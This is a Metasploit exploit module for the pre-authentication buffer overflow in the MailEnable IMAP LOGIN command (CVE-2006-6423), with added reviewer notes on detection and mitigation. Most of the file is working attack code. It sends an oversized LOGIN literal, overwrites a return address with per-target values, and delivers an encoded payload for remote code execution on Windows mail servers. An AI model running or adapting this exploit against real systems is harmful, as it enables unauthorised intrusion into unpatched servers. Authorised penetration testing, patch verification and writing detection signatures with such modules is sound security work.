Path: blob/master/modules/exploits/windows/imap/mailenable_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit remote exploit module for the MailEnable IMAP LOGIN buffer
# overflow tracked as CVE-2006-6423 (OSVDB 32125, BID 21492).
#
# Reviewer notes for defenders:
# * The LOGIN request is the first command sent after the banner and uses a
#   random user name, so no valid account is involved. Any host that can
#   reach the IMAP port (default 143 here) can reach the vulnerable code path.
# * On the wire the request announces a 10-octet literal ("{10}") and is then
#   followed by well over 500 bytes of data. A pre-authentication LOGIN whose
#   continuation data greatly exceeds the announced literal size is a useful
#   detection signal.
# * The module name lists MailEnable 2.34 and 2.35 as affected. Upgrading off
#   those builds and limiting who can reach the IMAP service are the
#   mitigations this page supports.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (references, payload constraints, targets)
  # and sets the default remote port to 143.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow',
        'Description' => %q{
          MailEnable's IMAP server contains a buffer overflow
          vulnerability in the Login command.
        },
        'Author' => ['MC'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2006-6423'],
          ['OSVDB', '32125'],
          ['BID', '21492']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        # Payload constraints: size limit, and the bytes (NUL, LF, CR, space)
        # that must not appear in the encoded payload.
        'Payload' => {
          'Space' => 450,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'MailEnable 2.35 Pro',
            { 'Ret' => 0x10049abb }
          ], # MEAISP.DLL

          # NOTE(review): 'Offset' is declared only on this target and is not
          # read by #exploit in this file, which uses the literal 556.
          [
            'MailEnable 2.34 Pro',
            {
              'Ret' => 0x76095d68,
              'Offset' => 556
            }
          ] # push esp # ret | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll]
        ],
        'DisclosureDate' => '2006-12-11',
        'DefaultTarget' => 0
      )
    )

    register_options([Opt::RPORT(143)])
  end

  # Connects, checks the first 50 bytes of the server greeting for
  # " OK IMAP4rev1", and only then sends the LOGIN line followed by the
  # oversized argument. When the greeting does not match, nothing is sent and
  # a status line is printed instead. The handler is started and the socket
  # closed in both cases.
  def exploit
    connect

    # Both buffers are built before the banner is read, as in the original.
    login_line = "a001 LOGIN #{rand_text_alpha_upper(4)} {10}\r\n"
    request_body = rand_text_alpha_upper(556) + [target.ret].pack('V')
    request_body << (payload.encoded + "\r\n\r\n")

    banner = sock.recv(50)
    speaks_imap4rev1 = banner =~ / OK IMAP4rev1/

    if speaks_imap4rev1
      print_status("Trying target #{target.name}...")
      sock.put(login_line)
      # Read whatever the server answers to the LOGIN line before continuing.
      sock.get_once(-1, 3)
      sock.put(request_body)
    else
      print_status("Not running IMAP4rev1...")
    end

    handler
    disconnect
  end
end